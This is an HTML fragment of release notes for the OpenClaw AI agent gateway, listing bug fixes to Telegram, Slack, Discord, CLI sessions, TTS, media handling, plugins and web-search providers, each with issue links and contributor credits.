<li>macOS/config: preserve existing <code>gateway.auth</code> and unrelated config keys during app fallback writes, so dashboard or Talk settings changes cannot strand Control UI clients by dropping persisted auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364348126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75631/hovercard" href="https://github.com/openclaw/openclaw/issues/75631">#75631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fuma2013/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fuma2013">@Fuma2013</a>.</li>
<li>Control UI/TUI: keep reconnecting chat sends bound to the same backing session id and let TUI relaunches resume the last selected session, avoiding silent fresh sessions after refresh, reconnect, or terminal restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225359321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63195/hovercard" href="https://github.com/openclaw/openclaw/issues/63195">#63195</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283461066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68162/hovercard" href="https://github.com/openclaw/openclaw/issues/68162">#68162</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342917722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73546/hovercard" href="https://github.com/openclaw/openclaw/issues/73546">#73546</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bond260312-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bond260312-cmyk">@bond260312-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhong18804784882/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhong18804784882">@zhong18804784882</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mtuwei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mtuwei">@mtuwei</a>.</li>
<li>Plugins/tools: let plugin manifests declare static tool availability so reply startup skips unavailable plugin tool runtimes instead of importing factories that only return <code>null</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Discord/reactions: skip reaction listener registration when DMs and group DMs are disabled and every configured guild has <code>reactionNotifications: "off"</code>, avoiding needless reaction-event queue work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078796783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47516/hovercard" href="https://github.com/openclaw/openclaw/issues/47516">#47516</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x4v13r1120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x4v13r1120">@x4v13r1120</a>.</li>
<li>CLI sessions: preserve explicit manual-attach reuse bindings so trusted CLI sessions are not invalidated on the first turn when auth, prompt, or MCP fingerprints drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75849/hovercard" href="https://github.com/openclaw/openclaw/issues/75849">#75849</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</li>
<li>Telegram/streaming: keep partial preview streaming enabled for plain reply-to replies, disabling drafts only for real native quote excerpts that require Telegram quote parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577179" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73505/hovercard" href="https://github.com/openclaw/openclaw/issues/73505">#73505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choury">@choury</a>.</li>
<li>Config: log the "newer OpenClaw" version warning once per process instead of once per config snapshot read. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367749952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75927/hovercard" href="https://github.com/openclaw/openclaw/pull/75927">#75927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Telegram/message actions: treat benign delete-message 400s as no-op warnings instead of runtime errors, so stale or already-removed messages do not create noisy delete failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345339727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73726" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73726/hovercard" href="https://github.com/openclaw/openclaw/issues/73726">#73726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Avicennasis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Avicennasis">@Avicennasis</a>.</li>
<li>Telegram: split long default markdown sends and media follow-up text into safe HTML chunks, so outbound messages over Telegram's limit no longer fail as one oversized Bot API request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367257816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75868/hovercard" href="https://github.com/openclaw/openclaw/issues/75868">#75868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</li>
<li>Gateway/chat history: merge Claude CLI transcript imports for Anthropic-routed sessions that still have a Claude CLI binding, so local chat history does not hide CLI JSONL turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367073060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75850/hovercard" href="https://github.com/openclaw/openclaw/issues/75850">#75850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</li>
<li>Media: trim serialized JSON suffixes after local <code>MEDIA:</code> directive file extensions, so generated-image metadata cannot pollute the parsed media path and cause false <code>ENOENT</code> delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360047482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75182/hovercard" href="https://github.com/openclaw/openclaw/issues/75182">#75182</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TnzGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TnzGit">@TnzGit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/runtime: hot-reload Gateway plugin runtime surfaces after plugin enable/disable changes while keeping source-changing plugin install, update, and uninstall operations restart-backed so loaded module code is not reused. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330564867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72097/hovercard" href="https://github.com/openclaw/openclaw/issues/72097">#72097</a>.</li>
<li>Cron: make scheduler reload schedule comparison tolerate malformed persisted jobs, so one bad cron entry no longer aborts the whole tick. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367497925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75886/hovercard" href="https://github.com/openclaw/openclaw/issues/75886">#75886</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samfox-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samfox-ai">@samfox-ai</a>.</li>
<li>Doctor/channels: warn after migrations when default Telegram or Discord accounts have no configured token and their env fallback (<code>TELEGRAM_BOT_TOKEN</code> or <code>DISCORD_BOT_TOKEN</code>) is unavailable, with secret-safe migration docs for checking state-dir <code>.env</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74298/hovercard" href="https://github.com/openclaw/openclaw/issues/74298">#74298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</li>
<li>Gateway/diagnostics: keep idle liveness samples in telemetry instead of visible warning logs unless diagnostic work is active, waiting, or queued. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/cron: reject provider-prefixed targets for the wrong channel and let prefixed announce targets such as <code>telegram:123</code> select their channel when delivery falls back to <code>last</code>, so Telegram IDs cannot be coerced into WhatsApp phone numbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162988650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56839/hovercard" href="https://github.com/openclaw/openclaw/issues/56839">#56839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bencoremans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bencoremans">@bencoremans</a>.</li>
<li>Control UI/chat: keep live replies visible when a raw session alias such as <code>main</code> sends the chat turn but Gateway emits events under the canonical session key for the same run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345216396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73716/hovercard" href="https://github.com/openclaw/openclaw/issues/73716">#73716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teebes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teebes">@teebes</a>.</li>
<li>CLI/models: reject <code>--agent</code> on <code>openclaw models set</code> and <code>set-image</code> instead of silently writing agent-scoped requests to global model defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68391/hovercard" href="https://github.com/openclaw/openclaw/issues/68391">#68391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derrickabellard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derrickabellard">@derrickabellard</a>.</li>
<li>CLI: stop treating the legacy singular <code>openclaw tool ...</code> token as a plugin id under restrictive <code>plugins.allow</code>, so it falls through as a normal unknown/reserved command instead of suggesting a stale allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243981916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64732/hovercard" href="https://github.com/openclaw/openclaw/issues/64732">#64732</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashtag1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashtag1974">@hashtag1974</a>.</li>
<li>Media: write inbound media buffers through same-directory temp files before rename, so failed disk writes do not leave zero-byte artifacts for later voice transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154946745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55966" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55966/hovercard" href="https://github.com/openclaw/openclaw/issues/55966">#55966</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</li>
<li>TTS/Telegram: keep trusted local audio generated by the TTS tool queued for voice-note delivery even when the run-level built-in tool list omits the raw <code>tts</code> name. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354905008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74752/hovercard" href="https://github.com/openclaw/openclaw/issues/74752">#74752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loveworld3033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loveworld3033">@Loveworld3033</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</li>
<li>TTS: require explicit user or config audio intent for the agent speech tool so dashboard chats stay text unless audio is requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303803702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69777/hovercard" href="https://github.com/openclaw/openclaw/issues/69777">#69777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</li>
<li>Plugins/config: keep bundled source-checkout plugins from being runtime-gated by install-only <code>minHostVersion</code> metadata, accept prerelease host floors, trim plugin-service startup failures to one log line, and avoid broad channel-runtime loading during base config parsing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</li>
<li>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</li>
<li>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</li>
<li>Providers/configure: preserve the existing default model when adding or reauthing a provider whose plugin returns a default-model config patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099627324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50268/hovercard" href="https://github.com/openclaw/openclaw/issues/50268">#50268</a>. Thanks @rixcorp-oc.</li>
<li>Slack/DMs/routing: honor <code>dmHistoryLimit</code> for fresh 1:1 DMs, keep top-level DMs on stable DM sessions even when <code>replyToMode</code> targets thread replies, send text/block-only proactive DMs directly with <code>chat.postMessage(channel=&lt;user id&gt;)</code>, match Slack target route syntax such as <code>channel:C...</code>, <code>user:U...</code>, or <code>&lt;@U...&gt;</code>, and match public-channel allowlists against bare runtime channel IDs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240708914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64427/hovercard" href="https://github.com/openclaw/openclaw/issues/64427">#64427</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184870759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58832/hovercard" href="https://github.com/openclaw/openclaw/issues/58832">#58832</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213098355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62042" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62042/hovercard" href="https://github.com/openclaw/openclaw/issues/62042">#62042</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048907648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41608/hovercard" href="https://github.com/openclaw/openclaw/issues/41608">#41608</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046643845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41264/hovercard" href="https://github.com/openclaw/openclaw/issues/41264">#41264</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160915756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56530/hovercard" href="https://github.com/openclaw/openclaw/pull/56530">#56530</a>. Thanks @brantley-creator, @daye-jjeong, @MarkMolina, @Winnsolutionsadmin, @babutree, and @Realworld404.</li>
<li>Slack/delivery/capabilities: preserve missing-scope details in outbound errors, read granted scopes from <code>auth.test</code> metadata before legacy APIs, retry Slack writes only for wrapped DNS request failures such as <code>EAI_AGAIN</code>, and prefer the account bound to the outbound target peer in multi-workspace sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216375787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62391/hovercard" href="https://github.com/openclaw/openclaw/issues/62391">#62391</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068646797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44625/hovercard" href="https://github.com/openclaw/openclaw/issues/44625">#44625</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289779783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68789/hovercard" href="https://github.com/openclaw/openclaw/issues/68789">#68789</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264751663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66807/hovercard" href="https://github.com/openclaw/openclaw/pull/66807">#66807</a>. Thanks @alexey-pelykh, @Qquanwei, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>, @sonnyb9, and @rijhsinghani.</li>
<li>Slack/message actions/tools: send media before follow-up Block Kit messages for file sends, forward agent-scoped media roots through the bundled upload-file path, resolve <code>&lt;!subteam^...&gt;</code> user-group mentions before waking mention-gated channels, and let <code>read</code> fetch an exact Slack message timestamp or thread reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111591995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51458/hovercard" href="https://github.com/openclaw/openclaw/issues/51458">#51458</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242973170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64625/hovercard" href="https://github.com/openclaw/openclaw/issues/64625">#64625</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346503795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73827/hovercard" href="https://github.com/openclaw/openclaw/issues/73827">#73827</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130437054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53943" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53943/hovercard" href="https://github.com/openclaw/openclaw/issues/53943">#53943</a>. Thanks @HirokiKobayashi-R, @benpchandler, @CG-Intelligence-Agent-Jack, and @zomars.</li>
<li>PDF/Gemini: send native PDF analysis API keys in the <code>x-goog-api-key</code> header instead of the request URL, keeping secrets out of proxy and access logs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202693803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60600" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60600/hovercard" href="https://github.com/openclaw/openclaw/pull/60600">#60600</a>. Thanks @garagon.</li>
<li>Web search/Gemini/DuckDuckGo/Brave/fetch: route abort signals into Gemini provider fetches, late-bind managed agent <code>web_search</code> calls to the current runtime config snapshot, reuse Google provider API key/base URL as lower-priority Gemini search fallbacks, pass Gemini freshness/date filters through grounding, include DuckDuckGo in setup, honor Gemini/Grok/x_search <code>baseUrl</code> overrides, point Brave metadata at canonical docs, support Brave LLM Context freshness/date ranges, resolve external <code>webFetchProviders</code> for non-sandboxed fetches, and point missing-key errors to <code>web_fetch</code> or browser where appropriate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338236726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72995" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72995/hovercard" href="https://github.com/openclaw/openclaw/issues/72995">#72995</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362762607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75420/hovercard" href="https://github.com/openclaw/openclaw/issues/75420">#75420</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261488656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66498" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66498/hovercard" href="https://github.com/openclaw/openclaw/issues/66498">#66498</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253504720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65862/hovercard" href="https://github.com/openclaw/openclaw/issues/65862">#65862</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253527816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65870/hovercard" href="https://github.com/openclaw/openclaw/issues/65870">#65870</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355873723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74915/hovercard" href="https://github.com/openclaw/openclaw/issues/74915">#74915</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167524438" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57496" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57496/hovercard" href="https://github.com/openclaw/openclaw/pull/57496">#57496</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254540581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65940/hovercard" href="https://github.com/openclaw/openclaw/pull/65940">#65940</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212565688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61972/hovercard" href="https://github.com/openclaw/openclaw/pull/61972">#61972</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253794124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65892" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65892/hovercard" href="https://github.com/openclaw/openclaw/pull/65892">#65892</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107380876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51005/hovercard" href="https://github.com/openclaw/openclaw/pull/51005">#51005</a>. Thanks @RoseKongPS, @richardmqq, @Aoiujz, @ismael-81, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>, @Magicray1217, @remusao, @ultrahighsuper, @mingmingtsao, and @zhaoyang97.</li>
